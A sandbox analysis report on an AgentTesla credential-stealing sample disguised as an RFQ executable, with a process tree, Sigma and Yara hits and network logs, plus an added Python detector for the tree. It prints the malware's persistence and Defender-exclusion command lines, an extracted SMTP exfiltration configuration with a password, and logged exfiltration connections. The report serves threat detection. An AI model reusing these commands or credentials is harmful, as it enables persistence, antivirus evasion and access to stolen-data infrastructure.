
Windows Analysis Report
RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe

Overview

General Information

Sample name:RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe
Analysis ID:1437973
MD5:e184c8b191b12744e919b3b95ce39a0e
SHA1:fe25931e12b1f5807b95cf222cd9ee74c2cb7ea2
SHA256:df9e900bc2aba3462d0b9d2fb4e81719604f4c63871a2225edce136c140e8fc8
Tags:exe

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: MSBuild connects to smtp port
Sigma detected: Schedule system process
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected UAC Bypass using CMSTP
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates multiple autostart registry keys
Disables UAC (registry)
Drops PE files with benign system names
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Conhost Spawned By Uncommon Parent Process
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe (PID: 7520 cmdline: "C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe" MD5: E184C8B191B12744E919B3B95CE39A0E)
    • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7676 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7748 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 7704 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp89F4.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 7776 cmdline: timeout 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • svchost.exe (PID: 7872 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: E184C8B191B12744E919B3B95CE39A0E)
        • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7228 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • InstallUtil.exe (PID: 3068 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
        • jsc.exe (PID: 5284 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" MD5: 94C8E57A80DFCA2482DEDB87B93D4FD9)
        • RegSvcs.exe (PID: 7588 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
        • CasPol.exe (PID: 7556 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
        • AddInProcess32.exe (PID: 7688 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
        • MSBuild.exe (PID: 7752 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • MSBuild.exe (PID: 7680 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • WerFault.exe (PID: 7788 cmdline: C:\Windows\system32\WerFault.exe -u -p 7872 -s 1104 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 7792 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: E184C8B191B12744E919B3B95CE39A0E)
    • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7972 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AddInProcess32.exe (PID: 8028 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • InstallUtil.exe (PID: 8084 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • WerFault.exe (PID: 7284 cmdline: C:\Windows\system32\WerFault.exe -u -p 7792 -s 1152 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 8156 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 7224 cmdline: C:\Windows\system32\WerFault.exe -pss -s 456 -p 7792 -ip 7792 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 7324 cmdline: C:\Windows\system32\WerFault.exe -pss -s 508 -p 7872 -ip 7872 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 8204 cmdline: C:\Windows\system32\WerFault.exe -pss -s 536 -p 7748 -ip 7748 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 8712 cmdline: C:\Windows\system32\WerFault.exe -pss -s 568 -p 8396 -ip 8396 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 7748 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: E184C8B191B12744E919B3B95CE39A0E)
    • conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4908 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 5568 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • AddInProcess32.exe (PID: 7660 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • AddInProcess32.exe (PID: 7740 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • WerFault.exe (PID: 8252 cmdline: C:\Windows\system32\WerFault.exe -u -p 7748 -s 1144 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 8396 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: E184C8B191B12744E919B3B95CE39A0E)
    • conhost.exe (PID: 8404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8660 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • jsc.exe (PID: 8676 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" MD5: 94C8E57A80DFCA2482DEDB87B93D4FD9)
    • jsc.exe (PID: 8696 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" MD5: 94C8E57A80DFCA2482DEDB87B93D4FD9)
    • WerFault.exe (PID: 8796 cmdline: C:\Windows\system32\WerFault.exe -u -p 8396 -s 1352 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • vexplorers.exe (PID: 8996 cmdline: "C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • conhost.exe (PID: 9004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • vexplorers.exe (PID: 9180 cmdline: "C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • conhost.exe (PID: 9188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
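The process tree above is the whole infection chain in one picture: the sample writes a copy of itself to AppData\Roaming under the system name svchost.exe, registers it with schtasks and a Run key, has PowerShell add a Defender exclusion for that path, and then launches argument-less .NET framework utilities (InstallUtil, jsc, RegSvcs, CasPol, AddInProcess32, MSBuild) as hollowing targets, which is why the network connections later appear under MSBuild and InstallUtil. The following Python is an added example, not part of the Joe Sandbox report or of any tool it names: it parses a subset of the tree lines copied from above (indentation preserved, since it encodes parentage) and flags those anomalies mechanically. The flag names, the list of "system" process names and the sample name/hash constants are this example's own assumptions.

```python
import re
from collections import defaultdict

# Subset of the process tree copied from the report above (same line shape).
TREE = r"""
  • RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe (PID: 7520 cmdline: "C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe" MD5: E184C8B191B12744E919B3B95CE39A0E)
    • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7676 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • schtasks.exe (PID: 7748 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • svchost.exe (PID: 7792 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: E184C8B191B12744E919B3B95CE39A0E)
    • powershell.exe (PID: 7972 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • InstallUtil.exe (PID: 8084 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • svchost.exe (PID: 8156 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
"""

SAMPLE_NAME = "RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe"  # from the report header
SAMPLE_MD5 = "e184c8b191b12744e919b3b95ce39a0e"                    # from the report header

# Assumed list of names that only belong under C:\Windows on a healthy host.
SYSTEM_NAMES = {"svchost.exe", "conhost.exe", "csrss.exe", "lsass.exe", "services.exe", "explorer.exe"}

LINE_RE = re.compile(
    r"^(?P<indent>\s*)• (?P<name>\S+) \(PID: (?P<pid>\d+) cmdline: (?P<cmd>.*) MD5: (?P<md5>[0-9A-Fa-f]{32})\)$"
)


def split_cmdline(cmd):
    """Return (image_path, arguments) from a Windows command line, honouring a quoted image path."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end], cmd[end + 1:].strip()
    parts = cmd.split(None, 1)
    return parts[0], (parts[1] if len(parts) > 1 else "")


def parse_tree(text):
    """Parse indented tree lines into {pid: {name, path, args, md5, parent}} using a depth stack."""
    procs, stack = {}, []  # stack holds (indent, pid) of open ancestors
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        indent = len(m["indent"])
        while stack and stack[-1][0] >= indent:  # a sibling or shallower node closes deeper ones
            stack.pop()
        pid = int(m["pid"])
        path, args = split_cmdline(m["cmd"])
        procs[pid] = {"name": m["name"], "path": path, "args": args,
                      "md5": m["md5"].lower(), "parent": stack[-1][1] if stack else None}
        stack.append((indent, pid))
    return procs


def under_windows(path):
    return path.lower().startswith("c:\\windows\\")


def analyze(text, sample_name, sample_md5):
    """Return {pid: sorted flag names} for every process that trips at least one check."""
    procs = parse_tree(text)
    findings = defaultdict(list)
    for pid, p in procs.items():
        base = p["path"].rsplit("\\", 1)[-1].lower()
        low = p["path"].lower() + " " + p["args"].lower()
        if base in SYSTEM_NAMES and not under_windows(p["path"]):
            findings[pid].append("system_name_outside_windows")      # "svchost.exe" in AppData
        if p["md5"] == sample_md5.lower() and p["name"].lower() != sample_name.lower():
            findings[pid].append("sample_hash_under_new_name")       # dropped copy of the sample
        if "\\microsoft.net\\framework" in p["path"].lower() and not p["args"]:
            findings[pid].append("dotnet_utility_without_args")      # classic hollowing target
            parent = procs.get(p["parent"])
            if parent and not under_windows(parent["path"]):
                findings[pid].append("dotnet_utility_parent_outside_windows")
        if "add-mppreference" in low and "-exclusionpath" in low:
            findings[pid].append("defender_exclusion_added")
        if "schtasks" in low and "/create" in low and "\\appdata\\" in low:
            findings[pid].append("scheduled_task_into_appdata")
    return {pid: sorted(flags) for pid, flags in findings.items()}


if __name__ == "__main__":
    procs = parse_tree(TREE)
    for pid, flags in analyze(TREE, SAMPLE_NAME, SAMPLE_MD5).items():
        p = procs[pid]
        print(f"PID {pid} ({p['name']}, parent {p['parent']}): {', '.join(flags)}")
```

The legitimate svchost.exe (PID 8156, C:\Windows\System32, different hash) and conhost.exe children produce no findings, which is the point of keying on path plus hash rather than on the image name alone.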
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Extracted malware configuration (AgentTesla): {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.zoho.eu", "Username": "logs@astonherald.com", "Password": "office12#"}
Yara matches, memory dumps (Source | Rule | Description | Author):
00000025.00000002.2880930308.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000F.00000002.2877570286.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000025.00000002.2880930308.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000A.00000002.1920918632.000002168033C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
Yara matches, unpacked PEs (Source | Rule | Description | Author):
10.2.svchost.exe.2169004f2c0.3.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
10.2.svchost.exe.2169004f2c0.3.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
10.2.svchost.exe.2169004f2c0.3.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  Matched strings:
  • 0x341e6:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x34258:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x342e2:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x34374:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x343de:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x34450:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x344e6:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x34576:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
10.2.svchost.exe.2169004f2c0.3.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
10.2.svchost.exe.2169004f2c0.3.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security

Networking

Source: Network Connection; Author: Joe Security; Data: DestinationIp: 185.230.214.164, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7752, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49739

System Summary

Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, ProcessId: 7520, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe
Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe", ParentImage: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, ParentProcessId: 7520, ParentProcessName: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 7676, ProcessName: cmd.exe
Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe", ParentImage: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, ParentProcessId: 7520, ParentProcessName: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 7676, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7792, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, ProcessId: 7972, ProcessName: powershell.exe
Source: Network Connection; Author: Kiran kumar s, oscd.community; Data: DestinationIp: 104.26.13.205, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7752, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49732
Source: Process started; Author: David Burkett, @signalblur; Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 7224, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7792, ProcessName: svchost.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali; Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 7224, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7792, ProcessName: svchost.exe
Source: Process started; Author: Tim Rauch; Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7792, ParentProcessName: svchost.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 7800, ProcessName: conhost.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: "C:\Users\user\AppData\Roaming\svchost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, ProcessId: 7520, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7792, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, ProcessId: 7972, ProcessName: powershell.exe
Source: Network Connection; Author: frack113; Data: DestinationIp: 185.230.214.164, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 8084, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49742
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , CommandLine: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7676, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , ProcessId: 7748, ProcessName: schtasks.exe
